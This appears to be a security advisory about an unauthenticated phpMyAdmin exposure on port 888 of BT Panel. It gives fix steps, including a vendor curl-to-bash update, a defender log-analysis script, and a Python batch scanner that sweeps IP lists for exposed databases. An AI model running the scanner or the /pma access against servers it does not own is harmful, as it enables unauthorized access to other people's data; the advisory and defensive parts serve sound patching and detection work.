
BT Panel (宝塔面板) unauthenticated access to phpMyAdmin (with batch script)


JieGe


1. Affected versions

Users of the Linux version 7.4.2 and the Windows version 6.8 must update to the latest version (other versions are not affected).

2. Fix


Alternatively, use the upgrade script (note: click Update on the panel home page first and only fall back to this command if that fails; do not run it from the panel's built-in SSH terminal):

    curl https://download.bt.cn/install/update_panel.sh|bash

Offline upgrade steps:

    Download the offline upgrade package: http://download.bt.cn/install/update/LinuxPanel-7.4.3.zip
    Upload the package to the /root directory on the server
    Extract it: unzip LinuxPanel-7.4.3.zip
    Change into the package directory: cd panel
    Run the upgrade script: bash update.sh
    Remove the package: cd .. && rm -f LinuxPanel-7.4.3.zip && rm -rf panel

3. Reproduction

Visiting IP:888/pma logs you straight into the database, with no authentication.

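A defender-side check for the exposure described above, added here and not part of the original post: it parses nginx-style "combined" access log lines from the port-888 phpMyAdmin vhost (the sample lines are constructed, not from a real panel) and reports which source addresses received a 200 from /pma while not on an admin allowlist, plus every address that touched /pma at all. The log format and the allowlist parameter are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines in nginx "combined" format, as the access log of the
# port-888 phpMyAdmin vhost might look. Not taken from any real server.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Sep/2020:10:01:02 +0800] "GET /pma/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Sep/2020:10:01:03 +0800] "GET /pma/index.php HTTP/1.1" 200 8842 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Sep/2020:10:02:00 +0800] "GET /pma/ HTTP/1.1" 401 0 "-" "curl/7.68.0"
192.0.2.25 - - [12/Sep/2020:10:03:00 +0800] "GET /phpmyadmin/ HTTP/1.1" 404 153 "-" "python-requests/2.24.0"
10.0.0.5 - - [12/Sep/2020:10:04:00 +0800] "GET /pma/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    return d


def pma_exposure(log_text, allowlist=frozenset()):
    """Count 200 responses under /pma per source IP, skipping allowlisted admin IPs.
    A non-empty result after patching means the unauthenticated path is still reachable."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["ip"] in allowlist:
            continue
        if rec["path"].startswith("/pma") and rec["status"] == 200:
            hits[rec["ip"]] += 1
    return dict(hits)


def pma_probes(log_text):
    """Every source IP that requested anything under /pma, whatever the status:
    this is what a sweep like the batch script in the next section leaves behind."""
    return sorted({rec["ip"] for rec in map(parse_line, log_text.splitlines())
                   if rec and rec["path"].startswith("/pma")})
```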

4. Batch script


#!/usr/bin/env python
# -*- coding:utf-8 -*-

"""
Author www.ti0s.com
"""

import sys
import argparse
import requests
from multiprocessing import Pool, Manager

print("""
_____ _ ____ ______ ____ ____ __ __
|_ _|(_) / \ / ___/ / ___\ / \ | \ / |
| | _ | / \ | \___ \ | / | / \ || \/ |
| | | || \__/ | /___ > _ | \___ | \__/ || |\ /| |
|_| |_| \____/ \/ (_) \____/ \____/ |_| \/ | |(C)
""")

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}


def btPam(ip):
    # An unpatched panel answers 200 on /pma/ without asking for credentials
    url = "http://%s:888/pma/" % (ip)
    try:
        res = requests.get(url, headers=headers, timeout=5)
    except requests.RequestException:
        # unreachable host or timeout: nothing to record
        return
    if res.status_code == 200:
        print("%s Potentially Vulnerable" % (ip))
        # append, so results written by parallel workers do not overwrite each other
        with open("result.txt", "a") as wf:
            wf.write(url + "\n")


def isbt(ip, q):
    print('Testing {}'.format(ip))
    btPam(ip)
    q.put(ip)


def readip(flie):
    ips = []
    with open(flie, "r") as rf:
        for i in rf.readlines():
            ip = i.strip()
            # strip scheme, port and trailing slash; str.lstrip/rstrip take a
            # character set rather than a prefix, so test the prefix explicitly
            for prefix in ("https://", "http://"):
                if ip.startswith(prefix):
                    ip = ip[len(prefix):]
            ip = ip.rstrip("/")
            if ip.endswith(":888"):
                ip = ip[:-len(":888")]
            if ip:
                ips.append(ip)
    return ips


def pool(ips):
    p = Pool(10)
    q = Manager().Queue()
    for i in ips:
        p.apply_async(isbt, args=(i, q,))
    p.close()
    p.join()
    print('请查看当前路径下文件:result.txt')


def run(filepath):
    ips = readip(filepath)
    pool(ips)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-l', '--file', dest='file', type=str, help='批量扫描IP地址,示例:-l ip.txt ')
    parser.add_argument('-i', '--ip', dest='ip', type=str, help='单独扫描IP地址,示例:-i 192.168.0.1')
    pa = parser.parse_args()
    if len(sys.argv[1:]) == 0:
        print("输入 -h 参数查看使用说明")
        sys.exit()
    if pa.ip:
        btPam(pa.ip)
    if pa.file:
        run(pa.file)


if __name__ == '__main__':
    main()
